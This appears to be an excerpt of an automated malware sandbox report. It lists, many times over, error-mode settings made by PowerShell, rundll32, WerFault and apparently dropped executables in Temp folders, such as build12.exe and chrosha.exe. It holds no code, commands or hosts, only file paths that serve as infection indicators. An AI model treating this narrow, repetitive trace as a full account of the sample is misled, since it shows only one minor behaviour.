Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
